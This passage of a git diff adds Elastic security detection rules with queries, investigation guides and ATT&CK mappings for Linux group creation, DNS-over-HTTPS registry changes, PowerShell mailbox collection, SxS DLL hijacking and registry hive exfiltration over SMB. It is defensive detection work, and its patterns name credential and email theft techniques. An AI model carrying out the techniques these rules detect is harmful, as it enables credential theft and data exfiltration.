+ "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4.json new file mode 100644 index 00000000000..82b9cdbc238 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create a new group. Attackers may create new groups to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Group Creation", + "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "iam where host.os.type == \"linux\" and (event.type == \"group\" and event.type == \"creation\") and\nprocess.name in (\"groupadd\", \"addgroup\") and group.name != null\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_108.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_108.json new file mode 100644 index 00000000000..bbedecdec44 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_108.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "DNS-over-HTTPS Enabled via Registry", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled\" and\n registry.data.strings : \"1\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode\" and\n registry.data.strings : \"secure\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\" and\n registry.data.strings : \"1\")\n", + "references": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a22a09c2-2162-4df0-a356-9aacbeb56a04_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_109.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_109.json new file mode 100644 index 00000000000..dcd33793733 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_109.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "DNS-over-HTTPS Enabled via Registry", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled\" and\n registry.data.strings : \"1\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode\" and\n registry.data.strings : \"secure\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\" and\n registry.data.strings : \"1\")\n", + "references": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "a22a09c2-2162-4df0-a356-9aacbeb56a04_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7.json new file mode 100644 index 00000000000..a11962b556e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can be used to collect data from mailboxes. Adversaries may target user email to collect sensitive information.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Mailbox Collection Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Mailbox Collection Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nEmail mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors.\n\nThis rule identifies scripts that contains methods and classes that can be abused to collect emails from local and remote mailboxes.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n - Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Related rules\n\n- Exporting Exchange Mailbox via PowerShell - 6aace640-e631-4870-ba8e-5fdda09325db\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (\n powershell.file.script_block_text : (\n \"Microsoft.Office.Interop.Outlook\" or\n \"Interop.Outlook.olDefaultFolders\" or\n \"::olFolderInBox\"\n ) or\n powershell.file.script_block_text : (\n \"Microsoft.Exchange.WebServices.Data.Folder\" or\n \"Microsoft.Exchange.WebServices.Data.FileAttachment\"\n )\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/apt29/Archive/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + }, + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 + }, + "id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107.json new file mode 100644 index 00000000000..648878be1ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation, change, or deletion of a DLL module within a Windows SxS local folder. Adversaries may abuse shared modules to execute malicious payloads by instructing the Windows module loader to load DLLs from arbitrary local paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via local SxS Shared Module", + "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.\n", + "query": "file where host.os.type == \"windows\" and file.extension : \"dll\" and file.path : \"C:\\\\*\\\\*.exe.local\\\\*.dll\"\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1129", + "name": "Shared Modules", + "reference": "https://attack.mitre.org/techniques/T1129/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108.json new file mode 100644 index 00000000000..6f09931215e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation, change, or deletion of a DLL module within a Windows SxS local folder. Adversaries may abuse shared modules to execute malicious payloads by instructing the Windows module loader to load DLLs from arbitrary local paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via local SxS Shared Module", + "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.\n", + "query": "file where host.os.type == \"windows\" and file.extension : \"dll\" and file.path : \"C:\\\\*\\\\*.exe.local\\\\*.dll\"\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1129", + "name": "Shared Modules", + "reference": "https://attack.mitre.org/techniques/T1129/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108.json new file mode 100644 index 00000000000..11c88ea46e4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a medium-size registry hive file on a Server Message Block (SMB) share, which may indicate an exfiltration attempt of a previously dumped Security Account Manager (SAM) registry hive for credential extraction on an attacker-controlled system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Registry File Creation in SMB Share", + "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\") and\n not file.path : (\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT\",\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT.LASTGOOD.LOAD\",\n \"?:\\\\Windows\\\\Netwrix\\\\Temp\\\\????????.???.offreg\",\n \"?:\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.*\\\\Settings\\\\settings.dat*\"\n )\n", + "references": [ + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a577e524-c2ee-47bd-9c5b-e917d01d3276_2.json b/packages/security_detection_engine/kibana/security_rule/a577e524-c2ee-47bd-9c5b-e917d01d3276_2.json new file mode 100644 index 00000000000..86defd7fae5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a577e524-c2ee-47bd-9c5b-e917d01d3276_2.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies instances where a binary is granted the CAP_SYS_ADMIN capability. In 